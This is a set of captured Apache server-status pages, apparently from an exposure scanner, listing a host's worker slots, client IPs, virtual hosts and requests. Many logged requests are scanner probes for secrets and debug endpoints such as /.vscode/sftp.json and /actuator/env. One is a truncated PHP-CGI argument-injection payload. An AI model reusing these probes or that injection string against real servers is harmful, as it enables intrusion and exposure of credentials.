(open/recv/resp/push/rst) 4-27627198050/76/30719_ 9.164050282231580.03.06979.81 162.158.123.107h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-27627198050/122/30973_ 8.36104557129809260.016.661063.22 162.10.161.82http/1.1done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-27627198050/103/31010_ 8.764000130650710.03.571065.16 172.68.135.32h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-27627198050/80/31269_ 9.271090143224050.02.44941.64 172.68.135.215h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-27627198050/70/30762_ 8.681040
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31548070e3548070e30112d10d
Apache Status Apache Server Status for 7f7ffb32-1f6e-4d16-bdaa-07377bcfaade.clouding.host (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Saturday, 01-Nov-2025 06:57:47 CET Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 266 Parent Server MPM Generation: 265 Server uptime: 49 days 18 hours 36 minutes 44 seconds Server load: 0.08 0.12 0.15 Total accesses: 1581947 - Total Traffic: 49.0 GB - Total Duration: 770849486 CPU Usage: u110.59 s150.17 cu8658.58 cs4835.57 - .32% CPU load .368 requests/sec - 11.9 kB/second - 32.5 kB/request - 487.279 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 02408286no0yes19000 12408285no0yes010000 22408284no0yes010000 32408417no1yes010000 42408287no0yes010000 Sum501 149000 ________W_________________________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-26524082860/48/30397_ 3.5700245912480.01.121103.46 209.38.248.17http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 0-26524082860/40/29883_ 3.52127144348160.00.731051.33 104.22.7.12h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-26524082860/47/30237_ 3.5700123206960.00.531032.62 209.38.248.17http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 0-26524082860/44/30202_ 3.5610135344800.00.631018.31 209.38.248.17http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 0-26524082860/52/30342_ 3.5610122576060.02.25995.57 209.38.248.17http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api/swagger.json HTTP/1.1 0-26524082860/42/30651_ 3.5700143817820.00.421088.71 209.38.248.17http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 0-26524082860/40/30516_ 3.4518151752970.01.09930.73 103.4.250.196http/1.1 0-26524082860/41/30043_ 3.221318122227560.00.58984.85 141.101.99.12h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-26524082860/51/30364W 3.5600134386960.01.22989.28 209.38.248.17http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 0-26524082860/45/30222_ 3.5610159965610.00.761076.38 209.38.248.17http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 1-26524082850/3/34634_ 1.392014354140527890.00.031042.92 172.68.70.16h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-26524082850/4/35178_ 0.89201433170150620.00.041119.35 45.131.155.101h2cinre-viewer.tandemhse.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-26524082850/4/34872_ 1.5620146164105800.00.011057.05 172.69.167.159h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-26524082850/0/34705_ 0.002014336152122520.00.001024.48 172.71.254.55h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-26524082850/2/35512_ 1.5620146144943100.00.001113.69 172.69.167.153h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-26524082850/4/36135_ 1.512014173152185120.00.031046.57 172.68.164.4h2tandemsl.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-26524082850/5/35216_ 1.56201430178230170.00.021065.69 172.69.167.154h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-26524082850/4/35899_ 1.5620130141606170.00.011007.11 172.69.167.159h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-26524082850/3/34117_ 1.5520142141371750.00.01927.08 172.69.167.152h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-26524082850/2/35389_ 1.5620190133219020.00.04982.26 172.69.167.154h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 2-26524082840/5/29322_ 1.5820130147032170.00.04807.25 172.69.167.136h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-26524082840/6/28550_ 1.5820130138156680.00.06830.14 172.69.167.149h2tandemsl.com:443idle, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 2-26524082840/4/29428_ 1.5820130207910980.00.01893.15 172.69.167.149h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 2-26524082840/3/28579_ 1.999340137891190.00.03814.29 172.71.150.178h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-26524082840/2/28957_ 0.168790107018590.00.001055.76 147.182.149.75http/1.1relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-26524082840/3/29112_ 1.579340119748360.00.00848.33 172.69.167.144h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-26524082840/2/29019_ 0.88879555117206780.00.03851.98 162.158.79.143h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-26524082840/4/28905_ 1.579291133838270.00.01858.89 172.69.167.134h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-26524082840/1/29243_ 2.01884386118075120.00.03925.13 108.162.227.16h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-26524082840/5/29013_ 1.5792920152817480.00.04889.94 172.69.167.149h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-26524084170/48/34018_ 3.9600198550550.00.331085.99 209.38.248.17http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 3-26524084170/51/32886_ 3.902339164554910.00.47984.67 172.68.164.5h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-26524084170/47/33749_ 3.9600165429560.00.261110.39 209.38.248.17http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 3-26524084170/55/33185_ 3.8422217348690.00.961108.96 103.4.250.196http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-26524084170/51/33142_ 3.9404139654490.01.641028.56 172.68.23.135h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-26524084170/44/33170_ 3.93021145563880.00.231050.11 162.158.123.92h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-26524084170/50/33449_ 3.9600119105800.00.981159.23 209.38.248.17http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 3-26524084170/50/33505_ 3.8001169244667290.00.641095.22 172.70.130.228h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-26524084170/46/32879_ 3.9600165733470.00.261032.05 209.38.248.17http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 3-26524084170/68/34031_ 3.9620172321320.00.611094.04 209.38.248.17http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger.json HTTP/1.1 4-26524082870/3/30246_ 1.5320170280326530.00.00955.14 172.69.167.155h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 4-26524082870/3/30457_ 0.3120190127857270.00.001038.50 164.90.228.79http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger-ui.html HTTP/1.1 4-26524082870/2/30525_ 1.5220194128805360.00.041052.65 172.69.167.155h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-26524082870/3/30797_ 0.31411826141197940.00.00923.71 157.230.19.140http/1.1pre.relehse.com:443GET /config.json HTTP/1.1 4-26524082870/0/30266_ 0.00411831145322870.00.00965.53 162.158.120.
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31548070e3548070e346764517
Apache Status Apache Server Status for 7f7ffb32-1f6e-4d16-bdaa-07377bcfaade.clouding.host (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Monday, 29-Apr-2024 02:31:21 CEST Restart Time: Wednesday, 31-Jan-2024 10:42:58 CET Parent Server Config. Generation: 840 Parent Server MPM Generation: 839 Server uptime: 88 days 14 hours 48 minutes 22 seconds Server load: 1.24 1.27 1.26 Total accesses: 2472703 - Total Traffic: 61.1 GB - Total Duration: 1461450802 CPU Usage: u273.16 s347.95 cu12979.2 cs9233.67 - .298% CPU load .323 requests/sec - 8.4 kB/second - 25.9 kB/request - 591.034 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 03159089no0yes010000 13159090no0yes010000 23159221no1yes19000 33159091no0yes010000 43159092no0yes010000 Sum501 149000 ________________________W_________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-83931590890/54/47987_ 8.932317234479720.00.751111.12 141.101.100.166h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-83931590890/47/48944_ 9.081228420262012590.00.721101.38 172.68.10.134h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 0-83931590890/53/48284_ 9.39500315052150.00.941197.91 172.70.214.147h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-83931590890/104/48337_ 8.66501141275798840.01.051073.96 172.70.214.68h2tandemsl.com:443done, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 0-83931590890/41/46874_ 8.57450229859390.00.771059.04 188.114.111.153h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-83931590890/74/46928_ 9.1030237075010.00.761144.43 159.89.127.165http/1.1 0-83931590890/54/47596_ 9.10450211042290.01.841027.72 172.70.162.188h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-83931590890/43/47548_ 9.064276362198450.00.601060.68 159.89.127.165h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-83931590890/50/48177_ 9.071228245248877760.00.831043.03 172.68.10.134h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-83931590890/44/49320_ 9.4022225968700.00.492490.55 159.89.127.165http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 1-83931590900/28/54602_ 7.973322251583300.00.831272.52 159.89.127.165h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-83931590900/25/54745_ 8.6410347329530.00.201195.16 159.89.127.165http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 1-83931590900/28/54026_ 8.6420322306400.00.221122.32 159.89.127.165http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 1-83931590900/35/54401_ 8.33673295269571280.00.961316.41 172.70.247.43h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-83931590900/36/54461_ 8.33678547581077140.01.591212.87 172.70.247.43h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-83931590900/35/52643_ 8.039340405527230.01.001326.68 198.41.224.200h2tandemsl.com:443done, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 1-83931590900/32/53510_ 8.346720287912990.00.351276.30 162.158.18.67h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-83931590900/30/54056_ 8.4141334909500.00.691100.58 159.89.127.165http/1.1 1-83931590900/30/55658_ 8.486780320637060.00.651349.89 162.158.163.114h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-83931590900/38/54254_ 8.320313296331360.00.271176.48 162.158.18.101h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-83931592210/521/45355_ 30.9400244740290.07.021022.30 159.89.127.165http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 2-83931592210/653/47047_ 30.573837251381550.013.641098.87 159.89.127.165h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-83931592210/592/47915_ 30.9352238108270.09.521021.30 159.89.127.165http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 2-83931592210/628/46248_ 30.905442332116250.09.002476.49 162.158.186.77h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 2-83931592210/528/46432W 30.9300228979760.06.061192.61 159.89.127.165http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 2-83931592210/551/46368_ 30.70233318289240.06.581025.52 141.101.95.30h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-83931592210/606/46038_ 30.8511241462310.08.122444.21 172.71.134.98h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-83931592210/595/46025_ 30.8121018230943550.09.011084.97 159.89.127.165http/1.1 2-83931592210/580/46623_ 30.89152254864570.08.401052.89 172.71.186.101h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-83931592210/539/45935_ 30.88287301925290.07.481012.74 103.108.45.105http/1.1barrerasdecontencion.com:443POST /xmlrpc.php HTTP/1.1 3-83931590910/72/48607_ 10.59308282263147900.01.261184.67 162.158.110.167h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-83931590910/63/48046_ 10.804508234424080.00.781191.01 159.89.127.165h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-83931590910/60/49467_ 10.60440347902520.00.711149.40 172.71.167.199h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-83931590910/131/49284_ 10.59308487410215590.01.051175.56 162.158.110.167h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 3-83931590910/68/48253_ 10.9110300830000.01.401038.49 159.89.127.165http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 3-83931590910/58/49371_ 10.83313490277986360.01.981223.77 172.71.147.24h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-83931590910/113/48246_ 10.704511278101130.02.901238.40 159.89.127.165http/1.1 3-83931590910/71/48223_ 10.62391925328495480.02.831058.08 172.71.134.48h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-83931590910/113/47779_ 10.484427355877320.012.411067.88 172.71.122.45h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-83931590910/72/48979_ 10.89490264805340.01.911159.85 162.158.90.94h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-83931590920/39/50657_ 8.12985281333226730.00.831275.91 172.71.238.178h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 4-83931590920/33/50983_ 8.399850260706400.014.192641.86 172.64.238.87h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-83931590920/31/49460_ 8.9100244354560.00.561102.67 159.89.127.165http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 4-83931590920/43/49286_ 8.9110358830020.00.991024.94 159.89.127.165http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 4-83931590920/58/49893_ 7.9600316106830.01.261253.17 172.69.58.17h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-83931590920/38/48752_ 8.67990489277738
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31548070e3548070e39071cc9e
Apache Status Apache Server Status for 7f7ffb32-1f6e-4d16-bdaa-07377bcfaade.clouding.host (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Thursday, 18-Apr-2024 23:49:09 CEST Restart Time: Wednesday, 31-Jan-2024 10:42:58 CET Parent Server Config. Generation: 743 Parent Server MPM Generation: 742 Server uptime: 78 days 12 hours 6 minutes 10 seconds Server load: 0.04 0.13 0.11 Total accesses: 2197870 - Total Traffic: 55.0 GB - Total Duration: 1278884255 CPU Usage: u216.4 s297.81 cu11688.7 cs8497.21 - .305% CPU load .324 requests/sec - 8.5 kB/second - 26.2 kB/request - 581.874 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 02805088no1yes010000 12805117no0yes010000 22804981no0yes010000 32804980no0yes19000 42804979no0yes010000 Sum501 149000 __________________________________W_______________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-74228050880/49/42816_ 5.480627212865100.00.561013.18 198.199.118.94http/1.1 0-74228050880/48/43230_ 5.7810242498180.01.48973.68 143.110.213.72http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 0-74228050880/50/42968_ 5.66432282888690.01.481068.73 143.110.213.72http/1.1 0-74228050880/47/42788_ 5.7810255036100.01.08965.59 143.110.213.72http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 0-74228050880/45/41926_ 5.743169211984360.01.14933.10 143.110.213.72h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-74228050880/47/41936_ 5.730146214051710.013.241002.51 143.110.213.72h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-74228050880/54/42097_ 5.743523191585930.00.78901.69 143.110.213.72http/1.1 0-74228050880/43/42480_ 5.612493343923500.00.33928.12 172.68.26.112h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-74228050880/44/42818_ 5.7800229491830.00.40913.11 143.110.213.72http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 0-74228050880/49/43788_ 5.7821207139290.00.412359.09 143.110.213.72http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 1-74228051170/82/49951_ 6.7231338225963230.01.831131.44 143.110.213.72h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-74228051170/84/49665_ 6.675411312562210.01.541099.89 172.70.126.155h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-74228051170/83/49111_ 7.0800298411490.01.131025.71 143.110.213.72http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-74228051170/82/49803_ 7.030141245073040.01.201191.49 66.61.96.239h2barrerasdecontencion.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-74228051170/82/49263_ 7.0651385134640.01.861115.88 143.110.213.72http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 1-74228051170/79/47702_ 7.0710369927610.01.021207.92 143.110.213.72http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 1-74228051170/86/48635_ 6.84434264123640.01.721189.86 143.110.213.72h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-74228051170/81/49519_ 7.0720305340170.01.42969.04 143.110.213.72http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 1-74228051170/79/51255_ 6.974303299310360.01.771205.31 143.110.213.72h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-74228051170/77/49361_ 7.0021065262036210.00.931082.88 143.110.213.72http/1.1 2-74228049810/7/39442_ 3.577550214913800.00.42898.98 172.64.236.111h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-74228049810/4/40670_ 2.927500225772350.00.01969.75 172.69.195.143h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-74228049810/8/41260_ 3.354560213734010.00.05866.22 146.190.63.248http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /telescope/requests HTTP/1.1 2-74228049810/8/40093_ 3.694560258356470.00.012343.35 172.70.246.102h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-74228049810/8/40340_ 3.464510203135390.00.711019.36 40.77.188.121h2barrerasdecontencion.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-74228049810/6/39924_ 2.9520291732070.00.15906.65 143.110.213.72http/1.1 2-74228049810/7/39745_ 2.854510198043190.00.102328.15 198.41.230.201h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-74228049810/8/40095_ 3.50451281207292860.00.03974.82 172.70.178.213h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-74228049810/7/40589_ 3.1630223250370.00.05883.56 143.110.213.72http/1.1 2-74228049810/8/39563_ 3.227500275390070.00.07867.03 172.68.19.98h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-74228049800/10/44011_ 2.244510237764530.00.051089.39 172.69.11.144h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-74228049800/10/43065_ 3.664513212969120.00.191078.75 198.41.224.171h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-74228049800/10/44364_ 2.836520254317980.00.07986.42 172.69.194.4h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-74228049800/10/44042_ 3.744560370376700.00.071054.91 172.70.247.129h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-74228049800/6/43643W 3.2100248931130.00.08936.89 143.110.213.72http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 3-74228049800/13/44392_ 3.55456659238441240.00.131080.46 172.69.59.153h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-74228049800/8/43288_ 3.124560255700160.00.391103.22 198.41.224.219h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-74228049800/8/42964_ 2.16652103303773240.00.03913.48 64.225.75.246http/1.1barrerasdecontencion.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-74228049800/10/42608_ 3.744563295081710.00.18942.21 172.70.246.31h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-74228049800/13/43812_ 2.844510213503260.00.211019.78 172.69.194.108h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-74228049790/11/44900_ 2.8812830264372780.00.071112.58 172.69.195.166h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-74228049790/11/44411_ 3.284510226326830.00.432497.62 146.190.63.248http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-74228049790/10/43401_ 2.864510216620280.00.12986.18 172.69.195.192h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-74228049790/7/43488_ 3.284510313903260.00.07934.11 146.190.63.248http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /_all_dbs HTTP/1.1 4-74228049790/7/43651_ 3.634560270196750.00.071112.67 172.68.195.207h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-74228049790/11/42781_ 3.164510251104000.00.22992.30 172.71.238.2h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/r
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31548070e3548070e3ba5f8473
Apache Status Apache Server Status for 7f7ffb32-1f6e-4d16-bdaa-07377bcfaade.clouding.host (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Wednesday, 10-Apr-2024 21:04:59 CEST Restart Time: Wednesday, 31-Jan-2024 10:42:58 CET Parent Server Config. Generation: 667 Parent Server MPM Generation: 666 Server uptime: 70 days 9 hours 22 minutes Server load: 0.02 0.08 0.07 Total accesses: 1970845 - Total Traffic: 49.9 GB - Total Duration: 1134939046 CPU Usage: u196.86 s270.09 cu10375.8 cs7578.02 - .303% CPU load .324 requests/sec - 8.6 kB/second - 26.6 kB/request - 575.864 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 02385637no0yes010000 12385507no1yes010000 22385506no0yes19000 32385508no0yes010000 42385505no0yes010000 Sum501 149000 _________________________W________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-66623856370/11/37870_ 3.8310060184169950.013.19906.09 172.70.57.176h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-66623856370/8/37548_ 3.8413320204155900.00.44863.81 172.68.27.20h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-66623856370/8/37541_ 3.12291228347250.00.66939.82 188.166.108.93h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-66623856370/8/37283_ 3.9013320214418240.00.18854.49 172.64.238.15h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-66623856370/6/36657_ 2.84101137169764320.00.05812.00 212.145.142.113h2relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-66623856370/11/36981_ 3.8310060180250830.00.26846.18 172.70.57.180h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-66623856370/11/36749_ 4.0100161712940.01.29764.09 172.70.127.118h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-66623856370/11/36892_ 4.1210110286231840.00.18824.03 172.64.236.94h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-66623856370/8/37805_ 4.5300195750420.00.05813.43 188.166.108.93http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 0-66623856370/9/38699_ 3.8413370170031390.00.062258.62 162.158.175.95h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-66623855070/81/44654_ 7.62100195747100.01.31982.76 172.70.34.65h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-66623855070/90/44579_ 7.6500288891430.01.15952.01 188.166.108.93http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 1-66623855070/85/44267_ 7.49035273211910.01.14942.90 188.166.108.93h2done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-66623855070/80/44895_ 7.5380205536920.01.091088.83 66.249.66.5http/1.1relehse.com:80GET /robots.txt HTTP/1.1 1-66623855070/132/44166_ 7.54118367686030.02.161001.51 66.249.66.9http/1.1relehse.com:443GET /login HTTP/1.1 1-66623855070/95/42481_ 7.6511337042550.02.541082.77 188.166.108.93http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 1-66623855070/87/43812_ 7.398418237376600.02.451074.83 45.138.16.240http/1.1done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-66623855070/82/44304_ 7.491114253177180.02.64859.47 188.166.108.93h2done, streams: 